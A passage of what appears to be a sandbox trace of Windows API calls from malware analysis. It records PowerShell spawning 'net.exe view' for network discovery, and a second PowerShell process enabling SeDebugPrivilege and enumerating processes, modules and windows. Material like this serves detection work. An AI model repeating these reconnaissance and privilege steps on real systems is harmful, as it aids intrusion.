[0070.274] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.274] CoTaskMemFree (pv=0x230440) [0070.288] CoTaskMemAlloc (cb=0x1d) returned 0x1b852c80 [0070.289] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\net.exe", dwFileAttributes=0x0, psfi=0x1c79e578, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c79e578) returned 0x4550 [0070.293] CoTaskMemFree (pv=0x1b852c80) [0070.297] GetConsoleWindow () returned 0x30270 [0070.308] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.308] CoTaskMemFree (pv=0x230440) [0070.310] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.310] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0070.310] CoTaskMemFree (pv=0x230440) [0070.318] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.318] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0070.318] CoTaskMemFree (pv=0x230440) [0070.321] CommandLineToArgvW (in: lpCmdLine=" view", pNumArgs=0x1c79e5c0 | out: pNumArgs=0x1c79e5c0) returned 0x1b852c80*="" [0070.323] lstrlenW (lpString="view") returned 4 [0070.324] CoTaskMemAlloc (cb=0xc) returned 0x1b852260 [0070.324] RtlMoveMemory (in: Destination=0x1b852260, Source=0x1b852c9a, Length=0xa | out: Destination=0x1b852260) [0070.324] CoTaskMemFree (pv=0x1b852260) [0070.325] LocalFree (hMem=0x1b852c80) returned 0x0 [0070.327] CoTaskMemAlloc (cb=0x804) returned 0x1b85e8a0 [0070.327] GetConsoleTitleW (in: lpConsoleTitle=0x1b85e8a0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0070.327] CoTaskMemFree (pv=0x1b85e8a0) [0070.341] CoTaskMemAlloc (cb=0x84) returned 0x248220 [0070.342] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\net.exe\" view", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c79e520*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x34efc58 | out: lpCommandLine="\"C:\\Windows\\system32\\net.exe\" view", lpProcessInformation=0x34efc58*(hProcess=0x350, hThread=0x34c, dwProcessId=0x54c, dwThreadId=0x5bc)) returned 1 [0070.348] CoTaskMemFree (pv=0x248220) [0070.350] CloseHandle (hObject=0x34c) returned 1 [0070.350] CoTaskMemAlloc (cb=0x1d) returned 0x1b852c80 [0070.350] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\net.exe", dwFileAttributes=0x0, psfi=0x1c79e5c8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c79e5c8) returned 0x4550 [0070.351] CoTaskMemFree (pv=0x1b852c80) [0070.582] GetCurrentProcess () returned 0xffffffffffffffff [0070.582] GetCurrentProcess () returned 0xffffffffffffffff [0070.583] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x350, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c79e6a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c79e6a8*=0x34c) returned 1 [0082.932] CloseHandle (hObject=0x34c) returned 1 [0082.939] GetExitCodeProcess (in: hProcess=0x350, lpExitCode=0x1c79e718 | out: lpExitCode=0x1c79e718*=0x2) returned 1 [0082.948] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0082.953] CloseHandle (hObject=0x350) returned 1 [0082.962] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0082.962] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.962] CoTaskMemFree (pv=0x230440) [0082.976] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0082.976] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.976] CoTaskMemFree (pv=0x230440) [0083.174] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0083.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.174] CoTaskMemFree (pv=0x230440) [0083.179] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0083.179] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.180] CoTaskMemFree (pv=0x230440) [0083.226] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0083.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.226] CoTaskMemFree (pv=0x230440) [0083.245] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0083.245] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.245] CoTaskMemFree (pv=0x230440) [0083.248] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0083.248] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.248] CoTaskMemFree (pv=0x230440) [0083.267] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0083.267] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.267] CoTaskMemFree (pv=0x230440) [0083.305] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0083.305] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.305] CoTaskMemFree (pv=0x230440) [0083.341] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0083.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.341] CoTaskMemFree (pv=0x230440) [0083.456] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0083.456] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1c79de10 | out: lpConsoleScreenBufferInfo=0x1c79de10) returned 1 [0083.460] GetConsoleOutputCP () returned 0x1b5 [0083.462] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c79dda0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c79dda0) returned 0 [0083.463] GetStdHandle (nStdHandle=0xfffffff5) returned 0xe8 [0083.463] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x1c79ddf0 | out: lpMode=0x1c79ddf0) returned 0 [0083.463] GetConsoleOutputCP () returned 0x1b5 [0083.463] GetFileType (hFile=0xe8) returned 0x3 [0083.476] WriteFile (in: hFile=0xe8, lpBuffer=0x3565010*, nNumberOfBytesToWrite=0x21, lpNumberOfBytesWritten=0x1c79dcd8, lpOverlapped=0x0 | out: lpBuffer=0x3565010*, lpNumberOfBytesWritten=0x1c79dcd8*=0x21, lpOverlapped=0x0) returned 1 [0083.476] WriteFile (in: hFile=0xe8, lpBuffer=0x3565010*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1c79dcd8, lpOverlapped=0x0 | out: lpBuffer=0x3565010*, lpNumberOfBytesWritten=0x1c79dcd8*=0x2, lpOverlapped=0x0) returned 1 [0083.591] GetStdHandle (nStdHandle=0xfffffff4) returned 0xec [0083.592] WriteFile (in: hFile=0xec, lpBuffer=0x1c79e754*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x1c79e638, lpOverlapped=0x0 | out: lpBuffer=0x1c79e754*, lpNumberOfBytesWritten=0x1c79e638*=0x0, lpOverlapped=0x0) returned 1 [0083.594] GetConsoleOutputCP () returned 0x1b5 [0083.787] WriteFile (in: hFile=0xec, lpBuffer=0x2f98fc0*, nNumberOfBytesToWrite=0x23, lpNumberOfBytesWritten=0x1c79e498, lpOverlapped=0x0 | out: lpBuffer=0x2f98fc0*, lpNumberOfBytesWritten=0x1c79e498*=0x23, lpOverlapped=0x0) returned 1 [0083.795] SetEvent (hEvent=0x3a4) returned 1 [0083.795] SetEvent (hEvent=0x398) returned 1 [0083.795] SetEvent (hEvent=0x39c) returned 1 [0083.795] SetEvent (hEvent=0x3a0) returned 1 [0083.795] SetEvent (hEvent=0x390) returned 1 [0083.795] SetEvent (hEvent=0x3a8) returned 1 [0083.795] SetEvent (hEvent=0x3ac) returned 1 [0083.809] SetEvent (hEvent=0x3cc) returned 1 [0083.809] SetEvent (hEvent=0x3b4) returned 1 [0083.866] CoUninitialize () Thread: id = 17 os_tid = 0x9ec [0083.872] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0083.875] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409 [0083.877] VirtualQuery (in: lpAddress=0x1d24d6e0, lpBuffer=0x1d24e5a0, dwLength=0x30 | out: lpBuffer=0x1d24e5a0*(BaseAddress=0x1d24d000, AllocationBase=0x1c8c0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0083.893] VirtualQuery (in: lpAddress=0x1d24d990, lpBuffer=0x1d24e850, dwLength=0x30 | out: lpBuffer=0x1d24e850*(BaseAddress=0x1d24d000, AllocationBase=0x1c8c0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0083.951] SetEvent (hEvent=0x3c0) returned 1 [0083.951] SetEvent (hEvent=0x354) returned 1 [0083.951] SetEvent (hEvent=0x35c) returned 1 [0083.951] SetEvent (hEvent=0x360) returned 1 [0083.951] SetEvent (hEvent=0x37c) returned 1 [0083.951] SetEvent (hEvent=0x370) returned 1 [0083.951] SetEvent (hEvent=0x374) returned 1 [0083.952] SetEvent (hEvent=0x378) returned 1 [0083.952] SetEvent (hEvent=0x380) returned 1 [0083.952] CoUninitialize () Process: id = "3" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0xc523000" os_pid = "0x54c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x5f4" cmd_line = "\"C:\\Windows\\system32\\net.exe\" view" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 15 os_tid = 0x5bc Thread: id = 16 os_tid = 0x7dc Process: id = "4" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x133ab000" os_pid = "0xa08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xad8" cmd_line = "powershell.exe -NoExit -Command -" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 18 os_tid = 0xa8c [0085.583] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0085.991] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0085.992] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0085.992] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0085.992] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0086.575] GetVersionExW (in: lpVersionInformation=0x16e020*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16e020*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0086.577] GetVersionExW (in: lpVersionInformation=0x16e020*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16e020*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0086.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16dc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16dce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.589] GetVersionExW (in: lpVersionInformation=0x16dd90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dd90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0086.590] SetErrorMode (uMode=0x1) returned 0x1 [0086.591] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16def0 | out: lpFileInformation=0x16def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0086.592] SetErrorMode (uMode=0x1) returned 0x1 [0086.595] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16e160 | out: lpdwHandle=0x16e160) returned 0x94c [0086.597] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d56fd8 | out: lpData=0x2d56fd8) returned 1 [0086.600] VerQueryValueW (in: pBlock=0x2d56fd8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16e0d8, puLen=0x16e0d0 | out: lplpBuffer=0x16e0d8*=0x2d57074, puLen=0x16e0d0) returned 1 [0086.603] lstrlenW (lpString="䅁") returned 1 [0086.612] VerQueryValueW (in: pBlock=0x2d56fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16e048, puLen=0x16e040 | out: lplpBuffer=0x16e048*=0x2d57150, puLen=0x16e040) returned 1 [0086.613] lstrlenW (lpString="Microsoft Corporation") returned 21 [0086.615] CoTaskMemAlloc (cb=0x2e) returned 0x2d29f0 [0086.615] lstrcpyW (in: lpString1=0x2d29f0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0086.616] CoTaskMemFree (pv=0x2d29f0) [0086.616] VerQueryValueW (in: pBlock=0x2d56fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16e048, puLen=0x16e040 | out: lplpBuffer=0x16e048*=0x2d571a4, puLen=0x16e040) returned 1 [0086.616] lstrlenW (lpString="System.Management.Automation") returned 28 [0086.616] CoTaskMemAlloc (cb=0x3c) returned 0x2d7cf0 [0086.616] lstrcpyW (in: lpString1=0x2d7cf0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0086.616] CoTaskMemFree (pv=0x2d7cf0) [0086.617] VerQueryValueW (in: pBlock=0x2d56fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16e048, puLen=0x16e040 | out: lplpBuffer=0x16e048*=0x2d57200, puLen=0x16e040) returned 1 [0086.617] lstrlenW (lpString="6.1.7601.17514") returned 14 [0086.617] CoTaskMemAlloc (cb=0x20) returned 0x2dd780 [0086.617] lstrcpyW (in: lpString1=0x2dd780, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0086.617] CoTaskMemFree (pv=0x2dd780) [0086.617] VerQueryValueW (in: pBlock=0x2d56fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16e048, puLen=0x16e040 | out: lplpBuffer=0x16e048*=0x2d57240, puLen=0x16e040) returned 1 [0086.617] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0086.617] CoTaskMemAlloc (cb=0x44) returned 0x2d7cf0 [0086.617] lstrcpyW (in: lpString1=0x2d7cf0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0086.617] CoTaskMemFree (pv=0x2d7cf0) [0086.617] VerQueryValueW (in: pBlock=0x2d56fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16e048, puLen=0x16e040 | out: lplpBuffer=0x16e048*=0x2d572a8, puLen=0x16e040) returned 1 [0086.617] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0086.617] CoTaskMemAlloc (cb=0x76) returned 0x280930 [0086.617] lstrcpyW (in: lpString1=0x280930, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0086.617] CoTaskMemFree (pv=0x280930) [0086.617] VerQueryValueW (in: pBlock=0x2d56fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16e048, puLen=0x16e040 | out: lplpBuffer=0x16e048*=0x2d57344, puLen=0x16e040) returned 1 [0086.617] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0086.617] CoTaskMemAlloc (cb=0x44) returned 0x2d7cf0 [0086.617] lstrcpyW (in: lpString1=0x2d7cf0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0086.617] CoTaskMemFree (pv=0x2d7cf0) [0086.617] VerQueryValueW (in: pBlock=0x2d56fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16e048, puLen=0x16e040 | out: lplpBuffer=0x16e048*=0x2d573a8, puLen=0x16e040) returned 1 [0086.617] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0086.617] CoTaskMemAlloc (cb=0x58) returned 0x266fa0 [0086.617] lstrcpyW (in: lpString1=0x266fa0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0086.617] CoTaskMemFree (pv=0x266fa0) [0086.617] VerQueryValueW (in: pBlock=0x2d56fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16e048, puLen=0x16e040 | out: lplpBuffer=0x16e048*=0x2d57424, puLen=0x16e040) returned 1 [0086.617] lstrlenW (lpString="6.1.7601.17514") returned 14 [0086.617] CoTaskMemAlloc (cb=0x20) returned 0x2dd780 [0086.617] lstrcpyW (in: lpString1=0x2dd780, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0086.617] CoTaskMemFree (pv=0x2dd780) [0086.617] VerQueryValueW (in: pBlock=0x2d56fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16e048, puLen=0x16e040 | out: lplpBuffer=0x16e048*=0x2d570cc, puLen=0x16e040) returned 1 [0086.617] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0086.618] CoTaskMemAlloc (cb=0x66) returned 0x271880 [0086.618] lstrcpyW (in: lpString1=0x271880, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0086.618] CoTaskMemFree (pv=0x271880) [0086.618] VerQueryValueW (in: pBlock=0x2d56fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16e048, puLen=0x16e040 | out: lplpBuffer=0x16e048*=0x0, puLen=0x16e040) returned 0 [0086.618] VerQueryValueW (in: pBlock=0x2d56fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16e048, puLen=0x16e040 | out: lplpBuffer=0x16e048*=0x0, puLen=0x16e040) returned 0 [0086.618] VerQueryValueW (in: pBlock=0x2d56fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16e048, puLen=0x16e040 | out: lplpBuffer=0x16e048*=0x0, puLen=0x16e040) returned 0 [0086.618] VerQueryValueW (in: pBlock=0x2d56fd8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16e018, puLen=0x16e010 | out: lplpBuffer=0x16e018*=0x2d57074, puLen=0x16e010) returned 1 [0086.619] CoTaskMemAlloc (cb=0x204) returned 0x293b40 [0086.619] VerLanguageNameW (in: wLang=0x0, szLang=0x293b40, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0086.620] CoTaskMemFree (pv=0x293b40) [0086.620] VerQueryValueW (in: pBlock=0x2d56fd8, lpSubBlock="\\", lplpBuffer=0x16e068, puLen=0x16e060 | out: lplpBuffer=0x16e068*=0x2d57000, puLen=0x16e060) returned 1 [0086.625] GetCurrentProcessId () returned 0xa08 [0086.641] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x16cf90 | out: lpLuid=0x16cf90*(LowPart=0x14, HighPart=0)) returned 1 [0086.645] GetCurrentProcess () returned 0xffffffffffffffff [0086.646] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x16cfb0 | out: TokenHandle=0x16cfb0*=0x2f8) returned 1 [0086.647] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x2d5a850*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0086.648] CloseHandle (hObject=0x2f8) returned 1 [0086.651] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa08) returned 0x2f8 [0086.660] EnumProcessModules (in: hProcess=0x2f8, lphModule=0x2d5a8b8, cb=0x200, lpcbNeeded=0x16dfc8 | out: lphModule=0x2d5a8b8, lpcbNeeded=0x16dfc8) returned 1 [0086.663] GetModuleInformation (in: hProcess=0x2f8, hModule=0x13f700000, lpmodinfo=0x2d5ab28, cb=0x18 | out: lpmodinfo=0x2d5ab28*(lpBaseOfDll=0x13f700000, SizeOfImage=0x77000, EntryPoint=0x13f70c63c)) returned 1 [0086.664] CoTaskMemAlloc (cb=0x804) returned 0x2e3610 [0086.664] GetModuleBaseNameW (in: hProcess=0x2f8, hModule=0x13f700000, lpBaseName=0x2e3610, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0086.664] CoTaskMemFree (pv=0x2e3610) [0086.665] CoTaskMemAlloc (cb=0x804) returned 0x2e3610 [0086.665] GetModuleFileNameExW (in: hProcess=0x2f8, hModule=0x13f700000, lpFilename=0x2e3610, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0086.665] CoTaskMemFree (pv=0x2e3610) [0086.666] CloseHandle (hObject=0x2f8) returned 1 [0086.673] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xa08) returned 0x2f8 [0086.674] GetExitCodeProcess (in: hProcess=0x2f8, lpExitCode=0x16e0f8 | out: lpExitCode=0x16e0f8*=0x103) returned 1 [0086.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d5b088, Length=0x20000, ResultLength=0x16e0c0 | out: SystemInformation=0x12d5b088, ResultLength=0x16e0c0*=0x12080) returned 0x0 [0086.697] EnumWindows (lpEnumFunc=0x2a366ac, lParam=0x0) returned 0 [0086.698] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x538 [0086.698] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x4ac [0086.698] GetWindowThreadProcessId (in: hWnd=0x300ee, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x4ac [0086.698] GetWindowThreadProcessId (in: hWnd=0x400c0, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x4ac [0086.698] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x514 [0086.698] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x4ac [0086.698] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x778 [0086.698] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x778 [0086.698] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x4ac [0086.699] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x4ac [0086.699] GetWindowThreadProcessId (in: hWnd=0x10062, 